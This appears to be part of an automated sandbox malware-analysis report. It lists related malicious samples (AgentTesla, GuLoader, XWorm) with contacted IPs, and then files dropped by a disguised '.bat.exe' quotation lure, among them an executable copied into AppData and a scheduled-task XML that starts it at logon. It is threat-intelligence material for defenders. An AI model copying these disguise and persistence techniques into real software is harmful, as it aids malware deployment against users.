	Benefit Enrollment -16oy1xb.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	JasonRAT	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	CHARIKLIA JUNIOR DETAILS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	DATASHEET.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO#8329837372938383839238PDF.exe	Get hash	malicious	XWorm	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.log

Download File

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.3792772635987225
Encrypted:	false
SSDEEP:	48:bWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:bLHxvCsIfA2KRHmOugw1s
MD5:	24BC35D470461ED90FC4BFFF902B8C7E
SHA1:	0FA16F6526E5ECF142B47EF95DC7FF9F6C12734A
SHA-256:	FF60D2E27C696044BADA174E175C85E8CACB9E310EDCAC365AE6864B38709EFF
SHA-512:	584AAF5C4E5CBD704DA722965920F21FF80CC25A7B79E6D552E8BDF7A30416AEC3CC7D314A9A15630A6B8EBDEADBB3CDC7784927E8276788DEE2DFF8556617F4
Malicious:	false
Preview:	@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0b2vosgo.bzw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5oe0ovcw.jm2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnvrsnpm.5ur.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_comoq3s5.21l.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2n0pgpb.g35.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_toifkqrq.u0w.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuxqlhhe.pme.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5cygng0.es0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp8B51.tmp

Download File

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1573
Entropy (8bit):	5.098415912201418
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewkv:HeLwYrFdOFzOz6dKrsuqx
MD5:	23461E4562AEEBF951201808EDB89320
SHA1:	72D7B749B6258FB4E786645F3B638A06229D3B75
SHA-256:	BDBBCE333850F4F331E1D770F9A4327F1CD958954954A9C01E4A30D4BE8D5E16
SHA-512:	0BD3E3E206262C3CC43E57D1F9FBDAC578AF41C5E47BE05FD17E3A1194EA783A97DDE43A764BE402DDE1BA099558F0D563E9B803677B53B1FD3A404AF5FE5ABA
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1573
Entropy (8bit):	5.098415912201418
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewkv:HeLwYrFdOFzOz6dKrsuqx
MD5:	23461E4562AEEBF951201808EDB89320
SHA1:	72D7B749B6258FB4E786645F3B638A06229D3B75
SHA-256:	BDBBCE333850F4F331E1D770F9A4327F1CD958954954A9C01E4A30D4BE8D5E16
SHA-512:	0BD3E3E206262C3CC43E57D1F9FBDAC578AF41C5E47BE05FD17E3A1194EA783A97DDE43A764BE402DDE1BA099558F0D563E9B803677B53B1FD3A404AF5FE5ABA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Download File

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1017856
Entropy (8bit):	7.548057359158885
Encrypted:	false
SSDEEP:	24576:Yij0gzjizxWgioJqE9p9jzOtXGnwaEalbcHNGtAlUDRL:1zjkW2H9p9PmXMOHNzUDB
MD5:	1AE7A890014EBA9C807C6ADEABAC7671
SHA1:	E3B92645849A3E064D9FC401BADF115DAB013839
SHA-256:	BBA1825BD893328442CB891A35420A5DA41A5431D1ADE643F085C5992E763D3A
SHA-512:	3A54469CAEB4052CB4B842B30292E5AE00C9BF2A29F0D293D975D7BD0283D657C2FB4C9FD0DF0797782EDA78474A9EAB5F8FA6D1FF66CEAF59F00E128FBAB2D7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0..^...(.......\|... ........@.. ....................................@..................................{..O........%........................................................................... ............... ..H............text...4\... ...^.................. ..`.rsrc....%.......&...`..............@..@.reloc..............................@..B.................\|......H............3..........tJ..h1............................................{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......(......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."

C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\INF\WmiApRpl\WmiApRpl.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\INF\WmiApRpl\WmiApRpl.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:	dropped
Size (bytes):	48786
Entropy (8bit):	3.5854495362228453
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:	DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:	1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:	7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:	433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

C:\Windows\System32\PerfStringBackup.INI

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	840878
Entropy (8bit):	3.4224066455051885
Encrypted:	false
SSDEEP:	3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
MD5:	D3ED23A3E63ACA8CF656C585568DA6D7
SHA1:	1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
SHA-256:	AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
SHA-512:	21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
Malicious:	false
Preview:	........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

C:\Windows\System32\PerfStringBackup.TMP

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	840878
Entropy (8bit):	3.4224066455051885
Encrypted:	false
SSDEEP:	3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
MD5:	D3ED23A3E63ACA8CF656C585568DA6D7
SHA1:	1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
SHA-256:	AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
SHA-512:	21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
Malicious:	false
Preview:	........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

C:\Windows\System32\perfc009.dat

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	data
Category:	dropped
Size (bytes):	137550
Entropy (8bit):	3.409189992022338
Encrypted:	false
SSDEEP:	1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
MD5:	084B771A167854C5B38E25D4E199B637
